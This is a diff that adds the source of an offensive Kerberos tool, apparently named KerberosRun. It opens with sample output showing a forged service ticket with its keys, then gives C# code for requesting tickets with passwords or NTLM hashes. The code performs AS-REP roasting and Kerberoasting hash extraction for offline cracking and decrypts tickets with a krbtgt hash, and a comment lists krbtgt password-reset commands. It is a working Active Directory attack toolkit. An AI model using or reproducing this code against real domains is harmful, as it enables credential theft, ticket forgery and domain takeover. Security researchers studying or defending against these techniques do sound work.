+                - KdcSignature :
+                   - PacType :  0
+                   - RODCIdentifier :  0
+                   - Signature :  EF1E9FF8EB12D5AA3CDC495AD6D057C9
+                   - SignatureData :  [...]
+                   - Type :  KERB_CHECKSUM_HMAC_MD5
+                   - Validated :  False
+                   - Validator :
+                      - Validator :  PaForUserChecksum
+                      - Validator :  EF1E9FF8EB12D5AA3CDC495AD6D057C9
+                - ServerSignature :
+                   - PacType :  0
+                   - RODCIdentifier :  0
+                   - Signature :  ED9A3DBAEE67298CCE3945D7968EE0FD
+                   - SignatureData :  [...]
+                   - Type :  KERB_CHECKSUM_HMAC_MD5
+                   - Validated :  False
+                   - Validator :
+                      - Validator :  PaForUserChecksum
+                      - Validator :  ED9A3DBAEE67298CCE3945D7968EE0FD
+                - DecodingErrors :
+                - HasRequiredFields :  True
+       - CAddr :
+       - Flags :  PreAuthenticated, Initial, Renewable, Forwardable
+       - Key :
+          - EType :  RC4_HMAC_NT
+          - Value :  CEC22E20AAC0FF470642013B9FD0CB7D
+       - Transited :
+          - Type :  0
+          - Contents :
+[*] Now you have a Sliver Ticket!
+[+] SliverTicket Ticket Kirbi:
+    - doIEoTCCBJ2gAwIBBaEDAgEWooIDsDCCA6xhggOoMIIDpKADAgEFoQ8bDWNvcnBsYWIubG9jYWyiJDAioAMCAQKhGzAZGwRsZGFwGxFkYzEuY29ycGxhYi5sb2NhbKOCA2QwggNgoAMCAReiggNXBIIDUwZXQPArGDZPB+Sy/VEr0dvHZzxuTgyjmi/Cjycbp3hiRFPPjYZARhHFmrTP5SB30Ht/VM7ed7VatlbcXBR+4dgGyT39fQFMr+T8qyzcsK36MR1Sa3szDZpBefxxq8rtevsYczyQbTQ9d3egdMJezSQveJ9I9seaRWIXSEyqAlJtRr9sIsL4gOkzO/V8f5PqwBgq9j36g9nDb5IYxor2orFeHGU++TJfc039YPSAdHMRFjBGIo1ogwkYJZQqGK3kzK2R7INSKv3qD19CiYN7VMet3UVSYpccOS7hwVIPzCc4XoxHaj2zONG6U3D9R9JJpI42mb8nn/yKM9iizuoAnBeGI5paAzQ63cC3HocbNmsuwcAeMJaPVtmncPmxqMaY352lqIc0k14RWxOTRnY0pvWWms59SVmhV+5t8pPgTb4pUMQ9ie5W4dH8bynSY7YcuJ8iMyx2cX/wup0KWAUspfZa4cFTD7BrAFoeEo0EYv/mE3eJ40koGdOVFKgoixV9d8S16tHSQA21Lcx4Yxdqj23MshgumgQY4Q0PR5shG/PGQquQQK9XIbyoI7l3sbxQ5+hwp02bCMJe3IeI6xMi5wFhhfrWtT6t3djHZqyPF/v7L6a24KG+MH4mCqZUDhSO1dFbd+KeBdFPj60f7XnrW9+4DGU5RdLO40h78kOA9SOB54j6C/Op9N8W5QM6GA6dYXm+kUD4c+Tg2/ldCoamSSANU2ba7XZaCeeKnoprjWlPO8ZzNmEGhape8jpEmW4fiDjVScPDd+2dsl8WwZEKKX5+ERJw5R7S1ecYFzCqSSLUxOxL9zJRDrh0l9yNGll6eGeft0vbrm4Fdw1fIp0uWbmWOhljcb2HWG8j5x3zty4ALbUA0dXJGUwDvvJRuIw2votHiFNTh/CS7X16JrElk06D3D+Ix4ohai6KyILW32mBz8/X36xyaAvsT0FZ8J8NMa9jJ4f5M3lSktoqrlUNO/sQMY3xFoV9kd+UM8ormt0w8UvAUMr53pL75mxaArzN3/96U5Ap7vBrA184luKnhWeL2lob+PUJDwWJGaJHZKHOK+O8fcvK51Nt2uutYBSTId4Ax0/j70TKssP44bANJOY6yML/s6qZS0gacUJVfbmsU3iao4HcMIHZoAMCAQCigdEEgc59gcswgciggcUwgcIwgb+gGzAZoAMCARehEgQQzsIuIKrA/0cGQgE7n9DLfaEPGw1jb3JwbGFiLmxvY2FsohYwFKADAgEBoQ0wCxsJYWRtaW51c2VyowcDBQBA4AAApREYDzIwMjAwNTI3MDg0MDQ3WqYRGA8yMDIwMDUyNzE4NDA0N1qnERgPMjAyMDA2MDMwODQwNDdaqA8bDWNvcnBsYWIubG9jYWypJDAioAMCAQKhGzAZGwRsZGFwGxFkYzEuY29ycGxhYi5sb2NhbA==
+[*] Ticket Info:
+    * KRB_CRED
+    * pvno :  5
+    * Tickets :  Kerberos.NET.Entities.KrbTicket
+    * Encrypted Data :
+       - Timestamp :
+       - USec :
+       - SAddress :
+       - RAddress :
+       - Nonce :
+       - Ticket Info :
+          - Realm :  corplab.local
+          - PName :
+             - Type :  NT_PRINCIPAL
+             - Name :  adminuser
+          - Flags :  PreAuthenticated, Initial, Renewable, Forwardable
+          - AuthTime :
+          - StartTime :  5/27/2020 8:40:47 AM +00:00
+          - EndTime :  5/27/2020 6:40:47 PM +00:00
+          - RenewTill :  6/3/2020 8:40:47 AM +00:00
+          - SRealm :  corplab.local
+          - SName :
+             - Type :  NT_SRV_INST
+             - Name :  ldap
+          - Key :
+             - EType :  RC4_HMAC_NT
+             - KeyValue :  CEC22E20AAC0FF470642013B9FD0CB7D
+[+] Done! Now enjoy your ticket.
+```
\ No newline at end of file
diff --git a/KerberosRun/KerberosRun.sln b/KerberosRun/KerberosRun.sln
new file mode 100644
index 0000000..0a04011
--- /dev/null
+++ b/KerberosRun/KerberosRun.sln
@@ -0,0 +1,24 @@
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio Version 16
+VisualStudioVersion = 16.0.29609.76
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "KerberosRun", "KerberosRun\KerberosRun.csproj", "{00A1C81F-FAE9-4F80-9F7B-88C16C41DB2A}"
+EndProject
+Global
+	GlobalSection(SolutionConfigurationPlatforms) = preSolution
+		Debug|anycpu = Debug|anycpu
+		Release|anycpu = Release|anycpu
+	EndGlobalSection
+	GlobalSection(ProjectConfigurationPlatforms) = postSolution
+		{00A1C81F-FAE9-4F80-9F7B-88C16C41DB2A}.Debug|anycpu.ActiveCfg = Debug|Any CPU
+		{00A1C81F-FAE9-4F80-9F7B-88C16C41DB2A}.Debug|anycpu.Build.0 = Debug|Any CPU
+		{00A1C81F-FAE9-4F80-9F7B-88C16C41DB2A}.Release|anycpu.ActiveCfg = Release|Any CPU
+		{00A1C81F-FAE9-4F80-9F7B-88C16C41DB2A}.Release|anycpu.Build.0 = Release|Any CPU
+	EndGlobalSection
+	GlobalSection(SolutionProperties) = preSolution
+		HideSolutionNode = FALSE
+	EndGlobalSection
+	GlobalSection(ExtensibilityGlobals) = postSolution
+		SolutionGuid = {1F9F1CC4-DCE7-4E85-A268-CD0D74E8229B}
+	EndGlobalSection
+EndGlobal
diff --git a/KerberosRun/KerberosRun/ASK.cs b/KerberosRun/KerberosRun/ASK.cs
new file mode 100644
index 0000000..77bee05
--- /dev/null
+++ b/KerberosRun/KerberosRun/ASK.cs
@@ -0,0 +1,948 @@
+using System;
+using Kerberos.NET.Client;
+using Kerberos.NET.Credentials;
+using Kerberos.NET.Crypto;
+using Kerberos.NET.Entities;
+using System.Threading;
+using Kerberos.NET.Transport;
+using Microsoft.Extensions.Logging;
+using Kerberos.NET;
+using System.Collections.Generic;
+using System.Linq;
+using System.Text;
+
+namespace KerberosRun
+{
+    class Ask
+    {
+        private static KerberosKey credKey;
+        private static KerberosCredential cred;
+        //askTGT
+        public static async System.Threading.Tasks.Task<KrbAsRep> askTGT(string kdc,
+            ILoggerFactory logger,
+            TcpKerberosTransport transport,
+            string username,
+            string password,
+            string domainName,
+            bool outKirbi = false,
+            bool verbose = false,
+            string format = "hashcat",
+            bool asreproast = false,
+            bool ptt = false,
+            string hash = null,
+            EncryptionType etype = EncryptionType.RC4_HMAC_NT,
+            bool outfile = false,
+            string tgtHash = null,
+            EncryptionType tgtEtype = EncryptionType.AES256_CTS_HMAC_SHA1_96
+            )
+        {
+            var now = DateTime.Now;
+
+            Console.WriteLine("[*] Starting Kerberos Authentication ...");
+
+            if (password != null)
+            { cred = new KerberosPasswordCredential(username, password, domainName); }
+            else
+            { cred = new Utils.KerberosHashCreds(username, hash, etype, domainName); }
+
+            credKey = cred.CreateKey();
+            
+            //Pre-Auth
+            KrbAsReq asReqMessage = null;
+            KrbAsRep asRep = null;
+            bool notPreauth = true;
+            AuthenticationOptions authOptions =
+            AuthenticationOptions.IncludePacRequest |
+            AuthenticationOptions.RenewableOk |
+            AuthenticationOptions.Canonicalize |
+            AuthenticationOptions.Renewable |
+            AuthenticationOptions.Forwardable;
+            int authAttempt = 0;
+
+            while (notPreauth)
+            {
+                authAttempt += 1;
+
+                try
+                {
+                    Console.WriteLine("[*] Sending AS-REQ ...");
+
+                    var kdcOptions = (KdcOptions)(authOptions & ~AuthenticationOptions.AllAuthentication);
+
+                    var hostAddress = Environment.MachineName;
+
+                    var pacRequest = new KrbPaPacRequest
+                    {
+                        IncludePac = authOptions.HasFlag(AuthenticationOptions.IncludePacRequest)
+                    };
+
+                    var padata = new List<KrbPaData>()
+                    {
+                        new KrbPaData
+                        {
+                            Type = PaDataType.PA_PAC_REQUEST,
+                            Value = pacRequest.Encode()
+                        }
+                    };
+
+                    
+                    asReqMessage = new KrbAsReq()
+                    {
+                        Body = new KrbKdcReqBody
+                        {
+                            Addresses = new[]
+                            {
+                                new KrbHostAddress
+                                {
+                                    AddressType = AddressType.NetBios,
+                                    Address = Encoding.ASCII.GetBytes(hostAddress.PadRight(16, ' '))
+                                }
+                            },
+                            CName = new KrbPrincipalName()
+                            {
+                                Type = PrincipalNameType.NT_PRINCIPAL,
+                                Name = new[] { username }// + "@" + domainName.ToUpper() }
+                            },
+                            //KrbPrincipalName.FromString(
+                            //    username,
+                            //   PrincipalNameType.NT_ENTERPRISE,
+                            //    domainName
+                            //),
+                            EType = KrbConstants.KerberosConstants.ETypes.ToArray(),//kdcReqEtype, 
+                            KdcOptions = kdcOptions,
+                            Nonce = KrbConstants.KerberosConstants.GetNonce(),
+                            RTime = KrbConstants.KerberosConstants.EndOfTime,
+                            Realm = credKey.PrincipalName.Realm,
+                            SName = new KrbPrincipalName
+                            {
+                                Type = PrincipalNameType.NT_SRV_INST,
+                                Name = new[] { "krbtgt", credKey.PrincipalName.Realm }
+                            },
+                            Till = KrbConstants.KerberosConstants.EndOfTime
+                        },
+                        PaData = padata.ToArray()
+                    };
+
+                    if (authOptions.HasFlag(AuthenticationOptions.PreAuthenticate))
+                    {
+                        var ts = new KrbPaEncTsEnc()
+                        {
+                            PaTimestamp = now,
+                            PaUSec = now.Millisecond,
+                        };
+
+                        var tsEncoded = ts.Encode();
+
+                        var padataAs = asReqMessage.PaData.ToList();
+                        
+                        KrbEncryptedData encData = KrbEncryptedData.Encrypt(
+                            tsEncoded,
+                            credKey,
+                            KeyUsage.PaEncTs
+                        );
+
+                        padataAs.Add(new KrbPaData
+                        {
+                            Type = PaDataType.PA_ENC_TIMESTAMP,
+                            Value = encData.Encode()
+                        });
+
+                        asReqMessage.PaData = padataAs.ToArray();
+                    }
+
+                    //AS-Req Part
+                    if (verbose) { PrintFunc.PrintReq(asReqMessage, credKey); }
+
+                    var asReq = asReqMessage.EncodeApplication();
+
+                    asRep = await transport.SendMessage<KrbAsRep>(
+                        domainName,
+                        asReq,
+                        default(CancellationToken));
+                    
+                }
+                catch (KerberosProtocolException pex)
+                {
+                    Console.WriteLine("[x] Kerberos Error: {0}", pex.Message);
+
+                    if (pex?.Error?.ErrorCode == KerberosErrorCode.KDC_ERR_PREAUTH_REQUIRED)
+                    {
+                        if (asreproast)
+                        {
+                            Console.WriteLine("[x] Sorry the provided user requires PreAuth.\n");
+                            Environment.Exit(0);
+                        }
+                        else
+                        {
+                            //Salt issue for RID 500 Built-in admin account
+                            //https://github.com/dotnet/Kerberos.NET/issues/164
+                            if (password != null)
+                            { cred = new KerberosPasswordCredential(username, password, domainName); }
+                            else
+                            { cred = new Utils.KerberosHashCreds(username, hash, etype, domainName); }
+
+                            cred.IncludePreAuthenticationHints(pex?.Error?.DecodePreAuthentication());
+                            credKey = cred.CreateKey();
+
+                            authOptions |= AuthenticationOptions.PreAuthenticate;
+                            Console.WriteLine("[*] Adding encrypted timestamp ...");
+                        }
+                       
+                    }
+                    else if (pex?.Error?.ErrorCode == KerberosErrorCode.KDC_ERR_PREAUTH_FAILED)
+                    {
+                        Console.WriteLine("[x] Invalid Credential! Authentication Stopped ...\n");
+                        Environment.Exit(0);
+                    }
+                    else
+                    {
+                        Console.WriteLine("[x] Authentication Stopped ...\n");
+                        Environment.Exit(0);
+                    }
+                }
+                if (authAttempt == 2 || asreproast)
+                {
+                    notPreauth = false;
+                }
+
+            }
+
+            Console.WriteLine("[*] Receiving AS-REP...");
+
+            if (asreproast)
+            {
+                //Asreproasting
+                string repHash = BitConverter.ToString(asRep.EncPart.Cipher.ToArray()).Replace("-", string.Empty);
+                repHash = repHash.Insert(32, "$");
+
+                string hashString = "";
+                if (format == "john")
+                {
+                    hashString = String.Format("$krb5asrep${0}@{1}:{2}", username, domainName, repHash);
+                    Console.WriteLine("[+] ASREPRoasting Hash: {0}", hashString);
+                }
+                else
+                {
+                    hashString = String.Format("$krb5asrep$23${0}@{1}:{2}", username, domainName, repHash);
+                    Console.WriteLine("[+] ASREPRoasting Hash: {0}", hashString);
+                }
+            }
+            else
+            {
+                try
+                {
+                    KrbEncAsRepPart asDecryptedRepPart = cred.DecryptKdcRep(
+                            asRep,
+                            KeyUsage.EncAsRepPart,
+                            d => KrbEncAsRepPart.DecodeApplication(d));
+
+                    if (verbose)
+                    {
+                        //AS-Rep Part
+                        PrintFunc.PrintRep(asRep, credKey);
+
+                        if (authOptions.HasFlag(AuthenticationOptions.PreAuthenticate))
+                        {
+                            Console.WriteLine("    * [Decrypted Enc-Part]:");
+
+                            PrintFunc.PrintRepEnc(asDecryptedRepPart, credKey);
+
+
+                            ////////////////////////////////////////decrypt TGT
+                            //// net stop ntds
+                            //// $key =Get-BootKey -Online
+                            //// $cred =  ConvertTo-SecureString -String "krbtgt" -AsPlainText -Force
+                            //// Set-ADDBAccountPassword -SamAccountName krbtgt -NewPassword $cred -DatabasePath C:\Windows\NTDS\ntds.dit -BootKey $key
+                            //// net start ntds
+
+                            ////KeyTable keytab = new KeyTable(System.IO.File.ReadAllBytes("C:\\Users\\Public\\krbtgt.keytab"));
+                            ////var krbtgtkey = keytab.GetKey(EncryptionType.AES256_CTS_HMAC_SHA1_96, asRep.Ticket.SName);
+                            ///
+
+                            if (!string.IsNullOrEmpty(tgtHash))
+                            {
+                                var krbtgtCred = new Utils.KerberosHashCreds("krbtgt", tgtHash, tgtEtype);
+
+                                //TGS - REQ Ticket Enc-Part
+                                var ticketDecrypted = asRep.Ticket.EncryptedPart.Decrypt
+                                    (krbtgtCred.CreateKey(),
+                                    KeyUsage.Ticket,
+                                    b => KrbEncTicketPart.DecodeApplication(b));
+                                Console.WriteLine("   * [Decrypted TGT]:");
+                                PrintFunc.PrintTicketEnc(ticketDecrypted);
+                                //Encrypt the ticket again
+                                asRep.Ticket.EncryptedPart = KrbEncryptedData.Encrypt(ticketDecrypted.EncodeApplication(),
+                                    krbtgtCred.CreateKey(), KeyUsage.Ticket);
+                            }
+
+                            //////////////////////////////////////TGT
+                        }
+                    }
+
+                    if (outKirbi || outfile)
+                    {
+                        var kirbiTGT = Kirbi.toKirbi(asRep, asDecryptedRepPart, ptt);
+                        if (outKirbi)
+                        {
+                            Console.WriteLine("[+] TGT Kirbi:");
+                            Console.WriteLine("    - {0}", Convert.ToBase64String(kirbiTGT));
+                        }
+                        if (outfile)
+                        {
+                            Utils.Utils.WriteBytesToFile(Utils.Utils.MakeTicketFileName(username), kirbiTGT);
+                        }
+                    }
+                    
+                }
+                catch (Exception e)
+                {
+                    Console.WriteLine("[x] {0}. Unable to decrypt the ticket, provided credential is invalid. (Check the ticket etype if you want to decrypt it)\n", e.Message);
+                    //Environment.Exit(0);
+                }
+            }
+
+
+
+            return (KrbAsRep)asRep;
+            
+        }
+
+
+
+        //askTGS
+        public static async System.Threading.Tasks.Task<TicketFlags> askTGS(string kdc,
+            ILoggerFactory logger,
+            TcpKerberosTransport transport,
+            KrbAsRep asRep,
+            string username,
+            string password,
+            string domainName,
+            string spn,
+            bool isUnconstrained = false,
+            bool outKirbi = false,
+            bool verbose = false,
+            bool kerberoast = false,
+            bool ptt = false,
+            string hash = null,
+            EncryptionType etype = EncryptionType.RC4_HMAC_NT,
+            bool outfile = false,
+            string srvName = null,
+            string tgsHash = null,
+            EncryptionType tgsEtype = EncryptionType.AES256_CTS_HMAC_SHA1_96
+            )
+        {
+
+            var now = DateTime.Now;
+
+            credKey = password != null ?
+                new KerberosPasswordCredential(username, password, domainName).CreateKey() :
+                new Utils.KerberosHashCreds(username, hash, etype, domainName).CreateKey();
+
+
+            KrbEncAsRepPart asDecrypted = cred.DecryptKdcRep(
+                 asRep,
+                 KeyUsage.EncAsRepPart,
+                 d => KrbEncAsRepPart.DecodeApplication(d));
+
+            var sessionKey = asDecrypted.Key;
+
+
+
+
+            //Request Service Ticket parameters
+
+            ApOptions apOptions = ApOptions.Reserved;
+            KdcOptions kdcOptions =
+            KdcOptions.Forwardable |
+            KdcOptions.Renewable |
+            KdcOptions.RenewableOk |
+            KdcOptions.Canonicalize;
+            string s4u = null;
+            KrbTicket s4uTicket = null;
+            KrbTicket u2uServerTicket = null;
+
+            if (isUnconstrained)
+            {
+                spn = $"krbtgt/{domainName}";
+                kdcOptions |= KdcOptions.Forwarded;
+            }
+
+
+            var rst = new RequestServiceTicket()
+            {
+                ServicePrincipalName = spn,
+                ApOptions = apOptions,
+                S4uTarget = s4u,
+                S4uTicket = s4uTicket,
+                UserToUserTicket = u2uServerTicket,
+                KdcOptions = kdcOptions,
+                Realm = domainName
+            };
+
+
+            var sname = rst.ServicePrincipalName.Split('/', '@');
+            var tgt = asRep.Ticket;
+
+            var additionalTickets = new List<KrbTicket>();
+
+            if (rst.KdcOptions.HasFlag(KdcOptions.EncTktInSkey) && rst.UserToUserTicket != null)
+            {
+                additionalTickets.Add(rst.UserToUserTicket);
+            }
+            if (!string.IsNullOrWhiteSpace(rst.S4uTarget))
+            {
+                rst.KdcOptions |= KdcOptions.Forwardable;
+            }
+            if (rst.S4uTicket != null)
+            {
+                rst.KdcOptions |= KdcOptions.ConstrainedDelegation;
+
+                additionalTickets.Add(rst.S4uTicket);
+            }
+
+            
+            var body = new KrbKdcReqBody
+            {
+                //Specify RC4 as the only supported EType
+                EType = new[] { EncryptionType.RC4_HMAC_NT },//KrbConstants.KerberosConstants.ETypes.ToArray(),
+                KdcOptions = rst.KdcOptions,
+                Nonce = KrbConstants.KerberosConstants.GetNonce(),
+                Realm = rst.Realm,
+                SName = new KrbPrincipalName()
+                {
+                    Type = PrincipalNameType.NT_SRV_INST,
+                    Name = sname
+                },
+                Till = KrbConstants.KerberosConstants.EndOfTime,
+                CName = rst.CNameHint
+            };
+
+            if (additionalTickets.Count > 0)
+            {
+                body.AdditionalTickets = additionalTickets.ToArray();
+            }
+
+            var bodyChecksum = KrbChecksum.Create(
+                body.Encode(),
+                sessionKey.AsKey(),
+                KeyUsage.PaTgsReqChecksum
+            );
+
+            //ApReq
+            //Authenticator
+            var authenticator = new KrbAuthenticator
+            {
+                CName = asRep.CName,
+                Realm = asRep.Ticket.Realm,
+                SequenceNumber = KrbConstants.KerberosConstants.GetNonce(),
+                Checksum = bodyChecksum,
+                CTime = now,
+                CuSec = now.Millisecond //new Random().Next(0, 999999)
+            };
+
+            var subSessionKey = KrbEncryptionKey.Generate(sessionKey.EType);
+
+            subSessionKey.Usage = KeyUsage.EncTgsRepPartSubSessionKey;
+            authenticator.Subkey = subSessionKey;
+
+            var encryptedAuthenticator = KrbEncryptedData.Encrypt(
+                authenticator.EncodeApplication(),
+                sessionKey.AsKey(),
+                KeyUsage.PaTgsReqAuthenticator
+            );
+
+            var apReq = new KrbApReq
+            {
+                Ticket = tgt,
+                ApOptions = apOptions,
+                Authenticator = encryptedAuthenticator
+            };
+
+
+            var pacOptions = new KrbPaPacOptions
+            {
+                Flags = PacOptions.BranchAware
+            }.Encode();
+
+            var paData = new List<KrbPaData>()
+            {
+                new KrbPaData
+                {
+                    Type = PaDataType.PA_TGS_REQ,
+                    Value = apReq.EncodeApplication()
+                },
+                new KrbPaData
+                {
+                    Type = PaDataType.PA_PAC_OPTIONS,
+                    Value = pacOptions
+                }
+            };
+
+
+
+            if (!string.IsNullOrWhiteSpace(rst.S4uTarget))
+            {
+                var paS4u = new KrbPaForUser
+                {
+                    AuthPackage = "Kerberos",
+                    UserName = new KrbPrincipalName { Type = PrincipalNameType.NT_ENTERPRISE, Name = new[] { s4u } },
+                    UserRealm = tgt.Realm
+                };
+                paS4u.GenerateChecksum(subSessionKey.AsKey());
+
+                paData.Add(new KrbPaData
+                {
+                    Type = PaDataType.PA_FOR_USER,
+                    Value = paS4u.Encode()
+                });
+            }
+
+            var tgs = new KrbTgsReq
+            {
+                PaData = paData.ToArray(),
+                Body = body
+            };
+
+
+
+            ReadOnlyMemory<byte> encodedTgs = tgs.EncodeApplication();
+
+
+            Console.WriteLine("[*] Sending TGS-REQ ...");
+            if (verbose) { PrintFunc.PrintReq(tgs, credKey, sessionKey.AsKey()); }
+            
+
+
+            CancellationToken cancellation = default;
+            cancellation.ThrowIfCancellationRequested();
+
+
+
+            KrbTgsRep tgsRep = null;
+            try
+            {
+                tgsRep = await transport.SendMessage<KrbTgsRep>(
+                rst.Realm,
+                encodedTgs,
+                cancellation
+                );
+            }
+            catch (KerberosProtocolException pex)
+            {
+                Console.WriteLine("[x] Kerberos Error: {0}\n", pex.Message);
+                Environment.Exit(0);
+            }
+
+
+            Console.WriteLine("[*] Receiving TGS-REP ...");
+            if (verbose) { PrintFunc.PrintRep(tgsRep, credKey); }
+
+
+
+
+
+
+
+
+
+
+            var returnFlag = TicketFlags.Anonymous;
+
+            try
+            {
+                //TGS-REP Enc-Part
+                //https://github.com/dotnet/Kerberos.NET/blob/develop/Kerberos.NET/Entities/Krb/KrbTgsReq.cs#L144
+                KrbEncTgsRepPart tgsDecryptedRepPart = tgsRep.EncPart.Decrypt<KrbEncTgsRepPart>(
+                    subSessionKey.AsKey(),
+                    KeyUsage.EncTgsRepPartSubSessionKey,
+                    (ReadOnlyMemory<byte> t) => KrbEncTgsRepPart.DecodeApplication(t));
+
+                if (verbose)
+                {
+                    Console.WriteLine("    * [Decrypted Enc-Part]:");
+                    PrintFunc.PrintRepEnc(tgsDecryptedRepPart, credKey);
+
+                    returnFlag = tgsDecryptedRepPart.Flags;
+
+
+                    if (!string.IsNullOrEmpty(tgsHash))
+                    {
+                        //=========================================
+                        //TGS Tiket Enc-Part
+                        //Service account Cred
+                        var kerbCred2 = new Utils.KerberosHashCreds(srvName, tgsHash, tgsEtype);
+
+                        //TGS-REQ Ticket Enc-Part
+                        KrbEncTicketPart ticketDecrypted = tgsRep.Ticket.EncryptedPart.Decrypt<KrbEncTicketPart>
+                            (kerbCred2.CreateKey(),
+                            KeyUsage.Ticket,
+                            (ReadOnlyMemory<byte> t) => KrbEncTicketPart.DecodeApplication(t));
+
+                        Console.WriteLine("    * [Decrypted Ticket Enc-Part]:");
+                        PrintFunc.PrintTicketEnc(ticketDecrypted);
+                        //=========================================
+
+                    }
+                }
+
+
+                if (outKirbi || outfile)
+                {
+                    var kirbiTGS = Kirbi.toKirbi(tgsRep, tgsDecryptedRepPart, ptt);
+                    if (outKirbi)
+                    {
+                        Console.WriteLine("[+] TGS Kirbi:");
+                        Console.WriteLine("    - {0}", Convert.ToBase64String(kirbiTGS));
+                    }
+                    if (outfile)
+                    {
+                        Utils.Utils.WriteBytesToFile(Utils.Utils.MakeTicketFileName(username, sname), kirbiTGS);
+                    }
+                }
+
+            }
+            catch (Exception e)
+            {
+                Console.WriteLine("[x] {0}", e.Message);
+            }
+           
+
+
+
+            if (kerberoast)
+            {
+                //Kerberoasting
+                var encType = (int)Enum.Parse(typeof(EncryptionType), tgsRep.Ticket.EncryptedPart.EType.ToString());
+                var myCipher = (BitConverter.ToString(tgsRep.Ticket.EncryptedPart.Cipher.ToArray())).Replace("-", "");
+                var kroasthash = String.Format("$krb5tgs${0}$*{1}${2}${3}*${4}${5}", encType, username, domainName, spn, myCipher.Substring(0, 32), myCipher.Substring(32));
+                Console.WriteLine("[+] Kerberoasting Hash: {0}", kroasthash);
+
+            }
+
+
+            return returnFlag;
+
+
+        }
+
+
+
+        //TODO...
+        //askTGS with TGT kirbi
+        public static async System.Threading.Tasks.Task<TicketFlags> askTGS2(string kdc,
+            ILoggerFactory logger,
+            TcpKerberosTransport transport,
+            KrbAsRep asRep,
+            string username,
+            string password,
+            string domainName,
+            string spn,
+            bool isUnconstrained = false,
+            bool outKirbi = false,
+            bool verbose = false,
+            bool kerberoast = false,
+            bool ptt = false,
+            string hash = null,
+            EncryptionType etype = EncryptionType.RC4_HMAC_NT,
+            bool outfile = false,
+            string srvName = null,
+            string tgsHash = null,
+            EncryptionType tgsEtype = EncryptionType.AES256_CTS_HMAC_SHA1_96
+            )
+        {
+
+            var now = DateTime.Now;
+
+            credKey = password != null ?
+                new KerberosPasswordCredential(username, password, domainName).CreateKey() :
+                new Utils.KerberosHashCreds(username, hash, etype, domainName).CreateKey();
+
+
+            KrbEncAsRepPart asDecrypted = cred.DecryptKdcRep(
+                 asRep,
+                 KeyUsage.EncAsRepPart,
+                 d => KrbEncAsRepPart.DecodeApplication(d));
+
+            var sessionKey = asDecrypted.Key;
+
+
+
+
+            //Request Service Ticket parameters
+
+            ApOptions apOptions = ApOptions.Reserved;
+            KdcOptions kdcOptions =
+            KdcOptions.Forwardable |
+            KdcOptions.Renewable |
+            KdcOptions.RenewableOk |
+            KdcOptions.Canonicalize;
+            string s4u = null;
+            KrbTicket s4uTicket = null;
+            KrbTicket u2uServerTicket = null;
+
+            if (isUnconstrained)
+            {
+                spn = $"krbtgt/{domainName}";
+                kdcOptions |= KdcOptions.Forwarded;
+            }
+
+
+            var rst = new RequestServiceTicket()
+            {
+                ServicePrincipalName = spn,
+                ApOptions = apOptions,
+                S4uTarget = s4u,
+                S4uTicket = s4uTicket,
+                UserToUserTicket = u2uServerTicket,
+                KdcOptions = kdcOptions,
+                Realm = domainName
+            };
+
+
+            var sname = rst.ServicePrincipalName.Split('/', '@');
+            var tgt = asRep.Ticket;
+
+            var additionalTickets = new List<KrbTicket>();
+
+            if (rst.KdcOptions.HasFlag(KdcOptions.EncTktInSkey) && rst.UserToUserTicket != null)
+            {
+                additionalTickets.Add(rst.UserToUserTicket);
+            }
+            if (!string.IsNullOrWhiteSpace(rst.S4uTarget))
+            {
+                rst.KdcOptions |= KdcOptions.Forwardable;
+            }
+            if (rst.S4uTicket != null)
+            {
+                rst.KdcOptions |= KdcOptions.ConstrainedDelegation;
+
+                additionalTickets.Add(rst.S4uTicket);
+            }
+
+
+            var body = new KrbKdcReqBody
+            {
+                //Specify RC4 as the only supported EType
+                EType = new[] { EncryptionType.RC4_HMAC_NT },//KrbConstants.KerberosConstants.ETypes.ToArray(),
+                KdcOptions = rst.KdcOptions,
+                Nonce = KrbConstants.KerberosConstants.GetNonce(),
+                Realm = rst.Realm,
+                SName = new KrbPrincipalName()
+                {
+                    Type = PrincipalNameType.NT_SRV_INST,
+                    Name = sname
+                },
+                Till = KrbConstants.KerberosConstants.EndOfTime,
+                CName = rst.CNameHint
+            };
+
+            if (additionalTickets.Count > 0)
+            {
+                body.AdditionalTickets = additionalTickets.ToArray();
+            }
+
+            var bodyChecksum = KrbChecksum.Create(
+                body.Encode(),
+                sessionKey.AsKey(),
+                KeyUsage.PaTgsReqChecksum
+            );
+
+            //ApReq
+            //Authenticator
+            var authenticator = new KrbAuthenticator
+            {
+                CName = asRep.CName,
+                Realm = asRep.Ticket.Realm,
+                SequenceNumber = KrbConstants.KerberosConstants.GetNonce(),
+                Checksum = bodyChecksum,
+                CTime = now,
+                CuSec = now.Millisecond //new Random().Next(0, 999999)
+            };
+
+            var subSessionKey = KrbEncryptionKey.Generate(sessionKey.EType);
+
+            subSessionKey.Usage = KeyUsage.EncTgsRepPartSubSessionKey;
+            authenticator.Subkey = subSessionKey;
+
+            var encryptedAuthenticator = KrbEncryptedData.Encrypt(
+                authenticator.EncodeApplication(),
+                sessionKey.AsKey(),
+                KeyUsage.PaTgsReqAuthenticator
+            );
+
+            var apReq = new KrbApReq
+            {
+                Ticket = tgt,
+                ApOptions = apOptions,
+                Authenticator = encryptedAuthenticator
+            };
+
+
+            var pacOptions = new KrbPaPacOptions
+            {
+                Flags = PacOptions.BranchAware
+            }.Encode();
+
+            var paData = new List<KrbPaData>()
+            {
+                new KrbPaData
+                {
+                    Type = PaDataType.PA_TGS_REQ,
+                    Value = apReq.EncodeApplication()
+                },
+                new KrbPaData
+                {
+                    Type = PaDataType.PA_PAC_OPTIONS,
+                    Value = pacOptions
+                }
+            };
+
+
+
+            if (!string.IsNullOrWhiteSpace(rst.S4uTarget))
+            {
+                var paS4u = new KrbPaForUser
+                {
+                    AuthPackage = "Kerberos",
+                    UserName = new KrbPrincipalName { Type = PrincipalNameType.NT_ENTERPRISE, Name = new[] { s4u } },
+                    UserRealm = tgt.Realm
+                };
+                paS4u.GenerateChecksum(subSessionKey.AsKey());
+
+                paData.Add(new KrbPaData
+                {
+                    Type = PaDataType.PA_FOR_USER,
+                    Value = paS4u.Encode()
+                });
+            }
+
+            var tgs = new KrbTgsReq
+            {
+                PaData = paData.ToArray(),
+                Body = body
+            };
+
+
+
+            ReadOnlyMemory<byte> encodedTgs = tgs.EncodeApplication();
+
+
+            Console.WriteLine("[*] Sending TGS-REQ ...");
+            if (verbose) { PrintFunc.PrintReq(tgs, credKey, sessionKey.AsKey()); }
+
+
+
+            CancellationToken cancellation = default;
